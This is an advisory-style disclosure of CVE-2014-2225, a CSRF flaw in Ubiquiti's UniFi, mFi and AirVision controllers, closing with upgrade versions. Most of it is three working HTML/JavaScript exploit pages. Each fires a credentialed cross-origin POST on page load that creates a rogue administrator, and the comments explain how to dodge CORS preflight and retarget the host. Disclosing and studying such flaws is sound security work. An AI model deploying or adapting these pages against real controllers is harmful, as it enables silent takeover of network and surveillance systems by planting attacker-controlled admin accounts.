# Vendor Homepage: (http://www.ubnt.com/)
|
|
|
|
# Tested on: Kali Linux
|
|
-----------------------------------------
|
|
Affected Products/Versions:
|
|
-----------------------------------------
|
|
UniFi Controller v2.4.6
|
|
mFi Controller v2.0.15
|
|
AirVision Controller v2.1.3
|
|
Note: Only the versions listed above were tested; earlier releases are likely affected as well.
|
|
|
|
|
|
-----------------
|
|
Description:
|
|
-----------------
|
|
Title: Cross-site Request Forgery (CSRF) — the controllers' add-admin API endpoints accept a cross-origin POST that carries the victim's existing session cookie, so an authenticated administrator who merely visits an attacker-controlled page has a new administrator account created on the controller (see the proof-of-concept pages below).
|
|
CVE: CVE-2014-2225
|
|
CWE: http://cwe.mitre.org/data/definitions/352.html
|
|
|
|
|
|
Detailed writeup: http://sethsec.blogspot.com/2014/07/cve-2014-2225.html
|
|
Researcher: Seth Art - @sethsec
|
|
|
|
---------------
|
|
UniFi POC:
|
|
|
|
---------------
|
|
|
|
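<!--
  CSRF proof of concept for the UniFi Controller add-admin endpoint.

  Preconditions: the victim is logged in to the controller at the
  hard-coded host:port below and loads this page in the same browser.
  Effect: a new administrator "csrf" with password "csrf" is created
  using the victim's session. The response is not readable cross-origin,
  but it does not need to be - the request is fire-and-forget.
-->
<html>
<head>
<script>
function sendCSRF()
{
    // Vulnerable endpoint. Adjust host/port to the controller under test
    // (the UniFi Controller listens on 8443 in this PoC).
    var url_base = "https://192.168.0.106:8443/api/add/admin";

    // URL-encoded form of {"name":"csrf","lang":"en_US","x_password":"csrf"}.
    // The controller evidently accepts this JSON even though the declared
    // content type is a form body.
    var post_data = "%7B%22name%22%3A%22csrf%22%2C%22lang%22%3A%22en_US%22%2C%22x_password%22%3A%22csrf%22%7D";

    var xmlhttp = new XMLHttpRequest();
    xmlhttp.open("POST", url_base, true);
    // Accept is a CORS-safelisted request header.
    xmlhttp.setRequestHeader("Accept", "*/*");
    // application/x-www-form-urlencoded is a CORS-safelisted content type, so
    // the browser sends this cross-origin POST without a preflight OPTIONS
    // request. Declaring application/json instead would be preflighted and
    // give the server a chance to refuse it.
    xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=UTF-8");
    // Must be the boolean true, not the string "true": this is what attaches
    // the victim's controller session cookie to the cross-origin request.
    xmlhttp.withCredentials = true;
    xmlhttp.send(post_data);
}
</script>
</head>
<!-- One body element only; the published PoC opened <body> twice. The
     onload handler fires the request as soon as the page is loaded. -->
<body onload="sendCSRF()">
<h1>CSRF POC</h1>
Sending CSRF Payload!!!
</body>
</html>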
|
|
|
|
-------------
|
|
mFi POC:
|
|
-------------
|
|
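<!--
  CSRF proof of concept for the mFi Controller add-admin endpoint.

  Preconditions: the victim is logged in to the controller at the
  hard-coded host:port below and loads this page in the same browser.
  Effect: a new administrator "csrf" with password "csrf" is created
  using the victim's session. The cross-origin response is opaque to this
  page, which is fine - nothing needs to be read back.
-->
<html>
<head>
<script>
function sendCSRF()
{
    // Vulnerable endpoint. Adjust host/port to the controller under test
    // (the mFi Controller listens on 6443 in this PoC).
    var url_base = "https://192.168.0.106:6443/api/v1.0/add/admin";

    // URL-encoded form of {"name":"csrf","lang":"en_US","x_password":"csrf"}.
    // The controller evidently accepts this JSON even though the declared
    // content type is a form body.
    var post_data = "%7B%22name%22%3A%22csrf%22%2C%22lang%22%3A%22en_US%22%2C%22x_password%22%3A%22csrf%22%7D";

    var xmlhttp = new XMLHttpRequest();
    xmlhttp.open("POST", url_base, true);
    // Accept is a CORS-safelisted request header.
    xmlhttp.setRequestHeader("Accept", "*/*");
    // application/x-www-form-urlencoded is a CORS-safelisted content type, so
    // the browser sends this cross-origin POST without a preflight OPTIONS
    // request; a non-safelisted type such as application/json would be
    // preflighted and could be refused by the server.
    xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=UTF-8");
    // Must be the boolean true, not the string "true": this is what attaches
    // the victim's controller session cookie to the cross-origin request.
    xmlhttp.withCredentials = true;
    xmlhttp.send(post_data);
}
</script>
</head>
<!-- One body element only; the published PoC opened <body> twice. The
     onload handler fires the request as soon as the page is loaded. -->
<body onload="sendCSRF()">
<h1>CSRF POC</h1>
Sending CSRF Payload!!!
</body>
</html>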
|
|
|
|
|
|
|
|
--------------------
|
|
|
|
AirVision POC:
|
|
--------------------
|
|
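<!--
  CSRF proof of concept for the AirVision Controller admin-creation endpoint.

  Preconditions: the victim is logged in to the controller at the
  hard-coded host:port below and loads this page in the same browser.
  Effect: a new admin user "csrf" with password "password" is created
  using the victim's session.
-->
<html>
<head>
<script>
function sendCSRF()
{
    // Vulnerable endpoint. Adjust host/port to the controller under test
    // (the AirVision Controller listens on 7443 in this PoC).
    var url_base = "https://192.168.0.106:7443/api/v2.0/admin";

    // Raw JSON body. The published PoC was mangled by smart quotes; this
    // serialises the same object so the quoting cannot be garbled again.
    // NOTE(review): the key is spelled "userGroup:" (trailing colon) in the
    // published PoC and is reproduced as-is; it looks like a typo for
    // "userGroup" - confirm against the controller's API before relying on
    // the group assignment.
    var post_data = JSON.stringify({
        "name": "csrf",
        "email": "csrf@gmail.com",
        "userGroup:": "admin",
        "x_password": "password",
        "confirmPassword": "password",
        "disabled": "false"
    });

    var xmlhttp = new XMLHttpRequest();
    xmlhttp.open("POST", url_base, true);
    // Accept is a CORS-safelisted request header.
    xmlhttp.setRequestHeader("Accept", "*/*");
    // NOTE(review): "application/plain" is not one of the CORS-safelisted
    // content types (application/x-www-form-urlencoded, multipart/form-data,
    // text/plain), so a spec-compliant browser preflights this request with
    // OPTIONS and only sends the POST if the controller answers the preflight
    // permissively. Kept exactly as published because that is what was tested;
    // if the POST never leaves the browser, "text/plain; charset=UTF-8"
    // avoids the preflight entirely.
    xmlhttp.setRequestHeader("Content-type", "application/plain; charset=UTF-8");
    // Must be the boolean true, not the string "true": this is what attaches
    // the victim's controller session cookie to the cross-origin request.
    xmlhttp.withCredentials = true;
    xmlhttp.send(post_data);
}
</script>
</head>
<!-- One body element only; the published PoC opened <body> twice. The
     onload handler fires the request as soon as the page is loaded. -->
<body onload="sendCSRF()">
<h1>CSRF POC</h1>
Sending CSRF Payload!!!
</body>
</html>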
|
|
|
|
|
|
|
|
-------------
|
|
Solution:
|
|
-------------
|
|
UniFi Controller - Upgrade to UniFi Controller v3.2.1 or greater
|
|
mFi Controller - Upgrade to mFi Controller v2.0.24 or greater
|
|
AirVision Controller - Upgrade to UniFi Video v3.0.1 or greater (Note: the application was renamed from AirVision to UniFi Video, so the fixed release ships under the new name)